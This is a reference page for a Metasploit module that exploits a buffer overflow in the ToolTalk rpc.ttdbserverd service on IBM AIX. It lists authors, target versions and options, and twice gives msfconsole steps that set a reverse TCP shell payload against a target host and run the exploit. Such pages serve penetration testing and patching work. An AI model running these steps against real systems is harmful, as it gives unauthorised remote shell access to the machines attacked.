ToolTalk rpc.ttdbserverd _tt_internal_realpath Buffer Overflow (AIX)
This module exploits a buffer overflow vulnerability in _tt_internal_realpath function of the ToolTalk database server (rpc.ttdbserverd).
Exploit Rank
- Great
Exploit Authors
- Adriano Lima < adriano [at] risesecurity.org >
- ramon < ramon [at] risesecurity.org >
Vulnerability References
Exploit Targets
- 0 - IBM AIX Version 6.1.4 (default)
- 1 - IBM AIX Version 6.1.3
- 2 - IBM AIX Version 6.1.2
- 3 - IBM AIX Version 6.1.1
- 4 - IBM AIX Version 6.1.0
- 5 - IBM AIX Version 5.3.10 5.3.9 5.3.8 5.3.7
- 6 - IBM AIX Version 5.3.10
- 7 - IBM AIX Version 5.3.9
- 8 - IBM AIX Version 5.3.8
- 9 - IBM AIX Version 5.3.7
- 10 - Debug IBM AIX Version 6.1
- 11 - Debug IBM AIX Version 5.3
Exploit Development
Similar Exploit Modules
Exploit Usage Information
$ msfconsole
## ### ## ##
## ## #### ###### #### ##### ##### ## #### ######
####### ## ## ## ## ## ## ## ## ## ## ### ##
####### ###### ## ##### #### ## ## ## ## ## ## ##
## # ## ## ## ## ## ## ##### ## ## ## ## ##
## ## #### ### ##### ##### ## #### #### #### ###
##
msf > use exploit/aix/rpc_ttdbserverd_realpath
msf exploit(rpc_ttdbserverd_realpath) > show payloads
msf exploit(rpc_ttdbserverd_realpath) > set PAYLOAD generic/shell_reverse_tcp
msf exploit(rpc_ttdbserverd_realpath) > set LHOST [MY IP ADDRESS]
msf exploit(rpc_ttdbserverd_realpath) > set RHOST [TARGET IP]
msf exploit(rpc_ttdbserverd_realpath) > exploit
## ### ## ##
## ## #### ###### #### ##### ##### ## #### ######
####### ## ## ## ## ## ## ## ## ## ## ### ##
####### ###### ## ##### #### ## ## ## ## ## ## ##
## # ## ## ## ## ## ## ##### ## ## ## ## ##
## ## #### ### ##### ##### ## #### #### #### ###
##
msf > use exploit/aix/rpc_ttdbserverd_realpath
msf exploit(rpc_ttdbserverd_realpath) > show payloads
msf exploit(rpc_ttdbserverd_realpath) > set PAYLOAD generic/shell_reverse_tcp
msf exploit(rpc_ttdbserverd_realpath) > set LHOST [MY IP ADDRESS]
msf exploit(rpc_ttdbserverd_realpath) > set RHOST [TARGET IP]
msf exploit(rpc_ttdbserverd_realpath) > exploit
Exploit Module Options
| RHOST | The target address |
| RPORT | The target port (default: 111) |
| BruteStep | Step size between brute force attempts |
| BruteWait | Delay between brute force attempts |
| CHOST | The local client address |
| CPORT | The local client port |
| ConnectTimeout | Maximum number of seconds to establish a TCP connection |
| ContextInformationFile | The information file that contains context information |
| DisablePayloadHandler | Disable the handler code for the selected payload |
| EnableContextEncoding | Use transient context when encoding payloads |
| Proxies | Use a proxy chain |
| SSL | Negotiate SSL for outgoing connections |
| SSLVersion | Specify the version of SSL that should be used (accepted: SSL2, SSL3, TLS1) |
| VERBOSE | Enable detailed status messages |
| WORKSPACE | Specify the workspace for this module |
| WfsDelay | Additional delay when waiting for a session |
| ONCRPC::tcp_request_fragmentation | Enable fragmentation of TCP ONC/RPC requests |
| TCP::max_send_size | Maxiumum tcp segment size. (0 = disable) |
| TCP::send_delay | Delays inserted before every send. (0 = disable) |
